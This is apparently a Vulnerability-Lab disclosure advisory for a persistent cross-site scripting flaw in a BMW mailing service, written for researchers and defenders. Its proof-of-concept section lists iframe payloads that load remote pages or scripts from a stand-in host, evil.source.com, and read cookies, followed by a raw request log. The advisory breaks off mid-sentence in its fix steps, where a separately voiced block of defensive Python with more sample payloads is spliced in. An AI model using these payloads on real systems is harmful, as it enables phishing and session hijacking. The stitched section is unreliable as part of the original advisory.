Site vulnerability-lab.com

BMW Online appears to allow script insertion that can get embedded into emails.

Document Title:
===============
BMW Online (Mail) - Persistent Web Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2262

Vulnerability Magazine: https://www.vulnerability-db.com/?q=articles/2021/10/19/bmw-mail-persistent-validation-vulnerability


Release Date:
=============
2021-10-19


Vulnerability Laboratory ID (VL-ID):
====================================
2262


Common Vulnerability Scoring System:
====================================
5.9


Vulnerability Class:
====================
Cross Site Scripting - Persistent


Current Estimated Price:
========================
1.000€ - 2.000€


Product & Service Introduction:
===============================
Bayerische Motoren Werke Aktiengesellschaft (BMW AG) is a globally operating, publicly listed automobile and motorcycle manufacturer headquartered in Munich
that operates under the brand name BMW Group. Its product range comprises the automobile and motorcycle brand BMW, the car brands Mini and Rolls-Royce, and the
BMW sub-brands BMW M and BMW i.

Since the 1960s in particular, the group has made a name for itself under the BMW brand as a manufacturer of high-priced, comfortably equipped and well-motorized
touring cars with sporting ambitions, and is therefore counted among the so-called premium manufacturers. In addition, the Mini brand targets younger,
lifestyle-oriented customers with retro models, while Rolls-Royce produces top-priced luxury limousines in small numbers. The core brand BMW traces back to
Rapp Motorenwerke, founded in Munich in 1913 by Karl Rapp. It was expanded by Franz Josef Popp from 1917 and traded from 1918 as Aktiengesellschaft
Bayerische Motorenwerke and from 1920 as Süddeutsche Bremsen-AG. The engine-building division and the old company name were sold in 1922 and incorporated
into Bayerische Flugzeugwerke AG, founded in 1916, which has traded as BMW ever since.

With revenue of 104.2 billion euros and around 134,000 employees in fiscal year 2019, BMW is one of Germany's largest companies, and with an annual
production of 2.54 million vehicles in 2019 it ranked among the 15 largest car manufacturers in the world. The company is listed on the stock exchange with
both ordinary and preference shares; the ordinary share is included in the German benchmark index DAX and in the DivDAX. The largest shareholders, together
holding about 46.8 %, are Susanne Klatten and Stefan Quandt, members of the Quandt industrial family. In addition, BMW was again listed in 2018 in the
sustainability indices Dow Jones Sustainability Indices (DJSI) "World" and "Europe" as well as FTSE4Good.

(Copy of the Homepage: https://de.wikipedia.org/wiki/BMW)


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent input validation web vulnerability in the BMW online service web-application.


Affected Product(s):
====================
BMW
Product: Mailing Server - Online Service (Web-Application) 2020 Q1


Vulnerability Disclosure Timeline:
==================================
2020-06-04: Researcher Notification & Coordination (Security Researcher)
2020-06-05: Vendor Notification (BMW-CERT Department)
2020-08-27: Vendor Response/Feedback (BMW-CERT Department)
2021-10-10: Vendor Fix/Patch by Check (BMW Service Developer Team)
2021-**-**: Security Acknowledgements (BMW-CERT Department)
2021-10-19: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Restricted Authentication (User Privileges)


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Bug Bounty


Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the official BMW online service portal web-application.
Guests are able to inject their own malicious script code on the application side of the vulnerable service module to compromise emails
or content delivered via the sender.

The vulnerability is located in the `firstname` and `lastname` parameters of the `mail` module. The vulnerable parameters are
insecurely sanitized before being delivered inside a basic HTML mail template.

Remote attackers are able to inject their own malicious script code via a POST request to the application side of the BMW domain mailing service.
The attack vector is persistent on the application side and the request method used to inject is POST. The attacker does not need
to be directly authenticated, because only an initial registration without an activation request is required. The injection points are the vulnerable
input fields of the BMW 4er Coupé registration form, and the execution of the malformed injected code takes place on the `mail.bmw.de` and `m.mail.bmw.de`
domains in the unique `/jsp/m.jsp` file via a client-side GET request.

The issue affects all pages listed with the newsletter module. The vulnerability allows email spoofing, phishing, spamming, cross-site requests for
redirects to malware or exploits, and persistent manipulation of BMW domain (email) content. A targeted user cannot see that the manipulated website
is insecure, because the content is delivered from a trusted native source, the BMW mailing domain (mail.bmw.de).

The exploitation of the persistent input validation web vulnerability requires no or low user interaction and no privileged application user account.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects to malicious sources
and persistent manipulation of the affected web module context.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] BMW 4er Coupé - Registration Form

Vulnerable Input(s):
[+] Vorname (Firstname)
[+] Nachname (Lastname)

Vulnerable Section(s):
[+] CONTENT

Vulnerable File(s):
[+] m.jsp

Affected Domain(s):
[+] mail.bmw.de
[+] m.mail.bmw.de


Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers with a low privileged application user account and medium required user interaction.
For security demonstration or to reproduce the security vulnerability, follow the provided information and steps below.


Payload: Phishing
test"><iframe src=http://www.evil.source.com/poc.html></iframe>


Payload: Session Hijacking
test"><iframe src=http://www.evil.source.com/ onload=alert(document.cookie)></iframe>
test"><iframe src=http://www.evil.source.com/ onload=alert(document.domain)></iframe>


Payload: Malware or Exploit
test"><iframe src=http://www.evil.source.com/poc.js></iframe>


Payload: Redirect
test"><window.frames["myFrame"].location = "http://...">


PoC: Demo URLs (Examples Non Malicious!)
https://m.mail.bmw.de/nl/jsp/m.jsp?c=%40Pv0kZwbsXqBiXLjqfLfhjQcmFl03K6l5EVY0L9chpQk%3D


--- PoC Session Logs (GET) [Execute] ---
https://m.mail.bmw.de/nl/jsp/m.jsp?c=%40Pv0kZwbsXqBiXLjqfLfhjQcmFl03K6l5EVY0L9chpQk%3D
Host: m.mail.bmw.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: uuid230=e171a7d5-3065-4691-9e39-dc051d6b6bb2; nlid=59b025|bd9a2846; bmwdtm_hq_userdata=lo:not logged in;
v_reco_data={"user":"returning","last_channel":"other","pages_viewed":{"https://www.bmw.de/de/index.html":2,
"https://configure.bmw.de/de_DE/configure/G22/11AP/FKFSW,P0668,S01S3":1},"site_sections_viewed":{"Index":2,"Configurator":1},
"session_duration":"622","configurator_session_duration":"8"}; at_check=true; bmwdtm_hq_vs=1591355369; s_lv=1591358075425; _cs_mk=0.8202769905305621_1591355369096;
_cs_c=1; _cs_id=d1d6f4a2-9e37-a0cf-fd19-495b95a51ace.1591355370.2.1591358075.1591358046.1.1625519370460.Lax.0;
AMCV_B52D1CFE5330949C0A490D45%40AdobeOrg=1585540135%7CMCMID%7C43471724831001338048363975029512836080%7CMCAID%7CNONE%7CMCOPTOUT-1591365306s%7CNONE%7CvVersion%7C4.4.0;
AMCVS_B52D1CFE5330949C0A490D45%40AdobeOrg=1;
s_ppvl=all-models%2520%253E%25204-series%2520%253E%2520coupe%2520%253E%25202020%2520%253E%2520bmw-4-series-coupe-highlights%2C93%2C65%2C6927%2C1920%2C884%2C1920%2C1080%2C1%2CP;
s_ppv=all-models%2520%253E%25204-series%2520%253E%2520coupe%2520%253E%25202020%2520%253E%2520bmw-4-series-coupe-models-equipment%2C100%2C100%2C7283%2C1920%2C884%2C1920%2C1080%2C1%2CP;
s_cc=true; dtTransferCookie==3=srv=2=sn=V9BCJG98FF13N2R0E8BB33TB9RSRD9AS=app:d6bac8ba1bbb22f2=1=ol=0=perc=100000=mul=1;
check=true; s_fid=%20;
last_config=%7B%22modelrange%22%3A%22G22%22%2C%22modelcode%22%3A%2211AP%22%2C%22ag_modelcode%22%3A%2211AP%22%2C%22brand%22%3A%22bmwCar%22%2C%22pain
t%22%3A%22P0668%22%2C%22rim%22%3A%22S01S3%22%2C%22fabric%22%3A%22FKFSW%22%2C%22options%22%3A%22FKFSW%2CP0668%2CS01CB%2CS01DF%2CS01S3%2CS0205%2CS0230
%2CS0255%2CS02PA%2CS02VB%2CS0428%2CS0431%2CS0493%2CS04AT%2CS04NE%2CS0508%2CS0534%2CS0544%2CS0548%2CS05AQ%2CS05DA%2CS0654%2CS06AE%2CS06AF%2CS06AK%2CS0
6C4%2CS06U2%2CS0801%2CS0851%2CS0879%2CS08KA%2CS08TF%2CS09QX%22%2C%22brandCosy%22%3A%22WBBM%22%7D; _pin_unauth=dWlkPU1ETXdNalZpTkRBdE9UQXhZUzAwWWpobUxX
STFaRE10WTJFM01XVm1PVEUxWVdRMg; mbox=session#caf2ce2d3adc47609e4fa1ac588d1a00#1591359906; bmwdtm_hq_sid=k55b3hBo5kgb;
bmwdtm_hq_pcg=topics%7Ctopics%20%3E%20fascination-bmw%7Ctopics%20%3E%20fascination-bmw%20%3E%20efficient-dynamics%7Ctopics%20%3E%20fascination-
bmw%20%3E%20efficient-dynamics%20%3E%20consumption-and-emissions%7Cconsumption-and-emissions; s_lv_s=Less%20than%201%20day; _cs_s=3.1
-
GET: HTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html; charset=utf-8
Date: Fri, 05 Jun 2020 11:57:59 GMT
Server: Apache
Vary: Accept-Encoding
X-Robots-Tag: noindex
X-UA-Compatible: IE=edge
Content-Length: 9916
Connection: keep-alive



PoC: Source (Email & Web Pages)
<!-- start CONTENT -->
<table border="0" cellpadding="0" cellspacing="0" role="presentation" width="100%">
<tbody>
<tr>
<td align="center"><!--[if (gte mso 9)|(IE)]>
<table role="presentation" align="center" border="0" cellspacing="0" cellpadding="0" width="600">
<tr>
<td align="center" valign="top" width="700">
<![endif]-->
<table align="center" border="0" cellpadding="0" cellspacing="0" role="presentation" style="max-width: 700px; background-color: #ffffff;" width="100%" bgcolor="#ffffff">
<tbody>
<tr>
<td align="center">
<!-- Place next article here -->
<!-- start EDITORIAL -->
<table role="presentation" border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td style="padding: 55px 0px 0px 0px;" width="100%">
<table role="presentation" border="0" cellpadding="0" cellspacing="0" width="100%">
<!-- start salutation -->
<tr>
<td align="left" class="mob-pad-l-r" style="color: #000000;font-family: 'BMW-Light', Arial, sans-serif; font-size: 24px;line-height: 30px;font-weight: 300;padding: 0px 30px 20px 30px;">
Sehr geehrter Herr Dr. B>"<Iframe%20Src=evil.source%20onload=alert(document.domain)>[VORNAME|NACHNAME - EXECUTION POINT!],


Reference(s):
https://www.bmw.de/de/ssl/requests/rfo-bmw.html#/dlo#%2Fbrand=BM&configId=g8f8j3l6&ucpBaseurl=https:%2F%2Fprod.ucp.bmw.cloud
https://www.bmw.de/de/ssl/requests/brand-switch-rfi/rfi-type-switch-bmw/rfi-post-bmw.html#/brand=BM&configId=g8f8j3l6&ucpBaseurl=https://prod.ucp.bmw.cloud


Solution - Fix & Patch:
=======================
1. The vulnerability can be patched by parsing and encoding the vulnerable `firstname` and `lastname` input fields in all affected newsletter registration forms.

2. Restrict the affected input fields and disallow the use of special characters to prevent malicious script code injection attacks.

3. Escape or safely encode the name parameter content in the generated HTML template on the affected BMW mailing or unique domain page.

4. Sanitize the affected name parameters in the outgoing emails on the BMW mail server to finally resolve the vulnerability.

5. Due to the manipulation of the content with a persistent vector, the internal security mechanisms should already have notified you about our interaction.
Normally, when a user changes contents, the page links need to be checked for malware or suspicious activities. In this case our attack was invisible to the CERT, which could assist to readjust
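The five fix steps above, together with the behaviour described under Technical Details, reduce to an output-encoding control, an input allowlist, and a review check over stored registrations. The Python below is an added example written for this advisory; it is not BMW's code and not the `m.jsp` template (which the page does not contain). The shape of the salutation line, the reserved host `attacker.invalid`, and the sample registration records are assumptions; the payload style follows the advisory's own PoC entries.

```python
import html
import re

# Hypothetical re-creation of the salutation line from the advisory's HTML
# source excerpt ("Sehr geehrter Herr Dr. [VORNAME|NACHNAME]"). The real
# m.jsp template is not on the page, so this shape is an assumption.
SALUTATION_TEMPLATE = "Sehr geehrter Herr Dr. {firstname} {lastname},"

# Allowlist for a person's name: starts with a letter, then letters (the
# Latin-1 ranges cover umlauts and ß), spaces, hyphens, apostrophes and
# dots; at most 80 characters. Quotes, angle brackets and '=' are rejected.
NAME_PATTERN = re.compile(r"^[A-Za-zÀ-ÖØ-öø-ÿ][A-Za-zÀ-ÖØ-öø-ÿ '.\-]{0,79}$")

# Fragments that must never occur in a name value: a tag, an inline event
# handler attribute (onload=, onerror=, ...) or a javascript: URL.
INJECTION_INDICATORS = re.compile(
    r"<\s*/?\s*[a-z!]"      # opening/closing tag or HTML comment
    r"|\bon[a-z]+\s*="      # inline event handler attribute
    r"|javascript\s*:",     # script URL scheme
    re.IGNORECASE,
)


def validate_name(value: str) -> bool:
    """Fix step 2: reject the registration when a name field is not a plain name."""
    return NAME_PATTERN.match(value) is not None


def render_salutation_vulnerable(firstname: str, lastname: str) -> str:
    """Behaviour the advisory describes: raw field values dropped into the HTML mail."""
    return SALUTATION_TEMPLATE.format(firstname=firstname, lastname=lastname)


def render_salutation_safe(firstname: str, lastname: str) -> str:
    """Fix steps 1/3/4: HTML-encode every name value (quotes included) at the
    point where it enters the template, independent of any input validation."""
    return SALUTATION_TEMPLATE.format(
        firstname=html.escape(firstname, quote=True),
        lastname=html.escape(lastname, quote=True),
    )


def find_injection_indicators(value: str) -> list:
    """Fix step 5: return the suspicious fragments found in one stored name value."""
    return INJECTION_INDICATORS.findall(value)


def flag_registrations(records: list) -> list:
    """Run the indicator check over stored registrations and return the ids whose
    first or last name carries markup, so they can be reviewed before a
    newsletter built from them is sent."""
    flagged = []
    for record in records:
        hits = (find_injection_indicators(record["firstname"])
                + find_injection_indicators(record["lastname"]))
        if hits:
            flagged.append(record["id"])
    return flagged


# Constructed sample registrations in the style of the advisory's payloads;
# attacker.invalid is a reserved placeholder host, not a real site.
SAMPLE_REGISTRATIONS = [
    {"id": 1, "firstname": "Anna-Lena", "lastname": "Müller"},
    {"id": 2, "firstname": 'test"><iframe src=http://attacker.invalid/poc.html></iframe>',
     "lastname": "Meier"},
    {"id": 3, "firstname": "Hans",
     "lastname": 'x"><iframe src=http://attacker.invalid/ onload=alert(document.domain)></iframe>'},
]


if __name__ == "__main__":
    injected = SAMPLE_REGISTRATIONS[1]
    print("vulnerable:", render_salutation_vulnerable(injected["firstname"], injected["lastname"]))
    print("hardened:  ", render_salutation_safe(injected["firstname"], injected["lastname"]))
    print("valid name?", validate_name(injected["firstname"]))
    print("flagged ids:", flag_registrations(SAMPLE_REGISTRATIONS))
```

The encoding in `render_salutation_safe` is the control that actually closes the hole: it neutralises the `">` break-out regardless of whether the allowlist was applied at registration time. The allowlist is defence in depth and also cuts down the review work. The indicator check deliberately runs over the stored field values rather than the rendered mail body, because the mail template legitimately contains tags and would always trigger.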


Note: https://www.vulnerability-db.com/?q=articles/2021/10/19/bmw-mail-persistent-validation-vulnerability


Security Risk:
==============
The security risk of the persistent input validation web vulnerability in the web application module is estimated as medium.
The vulnerability can be used to produce malicious and malformed content to phish users or exploit their session data with little effort.
The targeted users cannot see that the delivered content does not come from the original BMW source. The user does not need to
verify the registration, which allows the attack to be performed against other accounts in a simple way.


Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab


Disclaimer & Information:
=========================
The information provided in this advisory is provided as is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website are trademarks of the vulnerability-lab team and the specific authors or managers. To record, list, modify, use or
edit our material, contact ([email protected] or [email protected]) to ask for permission.

Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™



--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
LUDWIG-ERHARD STRAßE 4
34131 KASSEL - HESSEN
DEUTSCHLAND (DE)